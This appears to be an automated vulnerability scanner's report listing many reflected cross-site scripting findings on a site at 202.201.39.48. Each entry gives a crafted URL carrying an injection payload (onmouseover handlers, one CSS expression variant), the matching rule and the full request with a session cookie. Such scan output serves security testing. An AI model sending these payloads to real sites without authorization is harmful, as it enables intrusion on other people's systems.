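Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.html?'%20onmouseover=%22dfbhmg(6035)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6035)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6035)
Request & response GET /index.php/article/c37/p2.html?'%20onmouseover=%22dfbhmg(6035)%22%3e%20 HTTP/1.1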
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
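Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6324))%20var=%20
2. Set parameter var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6324))%20var=%20
3. Match in response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6324))
Request & response GET /index.php/article/c37/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6324))%20var=%20 HTTP/1.1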
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
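Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.html/'%20onmouseover=dfbhmg(6197)%20
2. Set parameter '%20onmouseover=dfbhmg(6197)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6197)
Request & response GET /index.php/article/c37/p2.html/'%20onmouseover=dfbhmg(6197)%20 HTTP/1.1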
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
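Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.html;'%20onmouseover=dfbhmg(6552)%20
2. Set parameter '%20onmouseover=dfbhmg(6552)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6552)
Request & response GET /index.php/article/c37/p2.html;'%20onmouseover=dfbhmg(6552)%20 HTTP/1.1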
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
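Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.html'%20onmouseover=%22dfbhmg(6473)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6473)%22%3e%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6473)
Request & response GET /index.php/article/c37/p2.html'%20onmouseover=%22dfbhmg(6473)%22%3e%20var=%20 HTTP/1.1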
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
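Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.mhtml?'%20onmouseover=dfbhmg(6555)%20
2. Set parameter '%20onmouseover=dfbhmg(6555)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6555)
Request & response GET /index.php/article/c37.mhtml?'%20onmouseover=dfbhmg(6555)%20 HTTP/1.1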
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
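Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.mhtml?var='%20onmouseover=dfbhmg(6143)%20var=%20
2. Set parameter var'%20onmouseover=dfbhmg(6143)%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6143)
Request & response GET /index.php/article/c37.mhtml?var='%20onmouseover=dfbhmg(6143)%20var=%20 HTTP/1.1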
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
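Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.mhtml/'%20onmouseover=dfbhmg(6980)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6980)%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6980)
Request & response GET /index.php/article/c37.mhtml/'%20onmouseover=dfbhmg(6980)%20var=%20 HTTP/1.1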
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
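Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.mhtml;'%20onmouseover=%22dfbhmg(6099)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6099)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6099)
Request & response GET /index.php/article/c37.mhtml;'%20onmouseover=%22dfbhmg(6099)%22%3e%20 HTTP/1.1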
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
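Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.mhtml'%20onmouseover=%22dfbhmg(6040)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6040)%22%3e%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6040)
Request & response GET /index.php/article/c37.mhtml'%20onmouseover=%22dfbhmg(6040)%22%3e%20var=%20 HTTP/1.1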
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/36.mhtml
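Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/36'%20onmouseover=dfbhmg(6535)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6535)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6535)
Request & response GET /index.php/article/36'%20onmouseover=dfbhmg(6535)%20.mhtml HTTP/1.1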
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/36.html

URL http://202.201.39.48/index.php/page/18.html
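Request method GET
Affected parameter value0
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/page/"%20onmouseover=%22dfbhmg(6192)%22%3e%20.html
2. Set parameter value0"%20onmouseover=%22dfbhmg(6192)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6192)
Request & response GET /index.php/page/"%20onmouseover=%22dfbhmg(6192)%22%3e%20.html HTTP/1.1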
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap/

URL http://202.201.39.48/index.php/article/37.html
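Request method GET
Affected parameter value0
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/37'%20onmouseover=%22dfbhmg(6360)%22%3e%20.html
2. Set parameter value0'%20onmouseover=%22dfbhmg(6360)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6360)
Request & response GET /index.php/article/37'%20onmouseover=%22dfbhmg(6360)%22%3e%20.html HTTP/1.1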
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap/

URL http://202.201.39.48/index.php/article/c19.mhtml
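Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.mhtml?'%20onmouseover=dfbhmg(6566)%20
2. Set parameter '%20onmouseover=dfbhmg(6566)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6566)
Request & response GET /index.php/article/c19.mhtml?'%20onmouseover=dfbhmg(6566)%20 HTTP/1.1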
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
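Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.mhtml?var='%20onmouseover=dfbhmg(6786)%20
2. Set parameter var'%20onmouseover=dfbhmg(6786)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6786)
Request & response GET /index.php/article/c19.mhtml?var='%20onmouseover=dfbhmg(6786)%20 HTTP/1.1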
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
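Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.mhtml/'%20onmouseover=%22dfbhmg(6209)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6209)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6209)
Request & response GET /index.php/article/c19.mhtml/'%20onmouseover=%22dfbhmg(6209)%22%3e%20 HTTP/1.1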
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
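Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.mhtml;'%20onmouseover=%22dfbhmg(6183)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6183)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6183)
Request & response GET /index.php/article/c19.mhtml;'%20onmouseover=%22dfbhmg(6183)%22%3e%20 HTTP/1.1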
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
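Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.mhtml'%20onmouseover=dfbhmg(6751)%20
2. Set parameter '%20onmouseover=dfbhmg(6751)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6751)
Request & response GET /index.php/article/c19.mhtml'%20onmouseover=dfbhmg(6751)%20 HTTP/1.1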
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c33.mhtml
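Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c33.mhtml?'%20onmouseover=%22dfbhmg(6856)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6856)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6856)
Request & response GET /index.php/article/c33.mhtml?'%20onmouseover=%22dfbhmg(6856)%22%3e%20 HTTP/1.1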
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c33.mhtml
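Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c33.mhtml?var='%20onmouseover=%22dfbhmg(6453)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6453)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6453)
Request & response GET /index.php/article/c33.mhtml?var='%20onmouseover=%22dfbhmg(6453)%22%3e%20 HTTP/1.1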
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/page/15.mhtml
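Request method GET
Affected parameter value0
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6262)%20.mhtml
2. Set parameter value0"%20onmouseover=dfbhmg(6262)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6262)
Request & response GET /index.php/page/"%20onmouseover=dfbhmg(6262)%20.mhtml HTTP/1.1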
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
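Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.mhtml?'%20onmouseover=dfbhmg(6970)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6970)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6970)
Request & response GET /index.php/article/c17.mhtml?'%20onmouseover=dfbhmg(6970)%20var=%20 HTTP/1.1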
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
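Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.mhtml?var='%20onmouseover=dfbhmg(6612)%20
2. Set parameter var'%20onmouseover=dfbhmg(6612)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6612)
Request & response GET /index.php/article/c17.mhtml?var='%20onmouseover=dfbhmg(6612)%20 HTTP/1.1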
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
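Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.mhtml/'%20onmouseover=%22dfbhmg(6608)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6608)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6608)
Request & response GET /index.php/article/c17.mhtml/'%20onmouseover=%22dfbhmg(6608)%22%3e%20var=%20 HTTP/1.1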
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
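Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.mhtml;'%20onmouseover=%22dfbhmg(6071)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6071)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6071)
Request & response GET /index.php/article/c17.mhtml;'%20onmouseover=%22dfbhmg(6071)%22%3e%20 HTTP/1.1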
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
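Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.mhtml'%20onmouseover=%22dfbhmg(6422)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6422)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6422)
Request & response GET /index.php/article/c17.mhtml'%20onmouseover=%22dfbhmg(6422)%22%3e%20 HTTP/1.1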
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/33.mhtml
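Request method GET
Affected parameter value0
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/33'%20onmouseover=%22dfbhmg(6102)%22%3e%20.mhtml
2. Set parameter value0'%20onmouseover=%22dfbhmg(6102)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6102)
Request & response GET /index.php/article/33'%20onmouseover=%22dfbhmg(6102)%22%3e%20.mhtml HTTP/1.1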
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c18.mhtml
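Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
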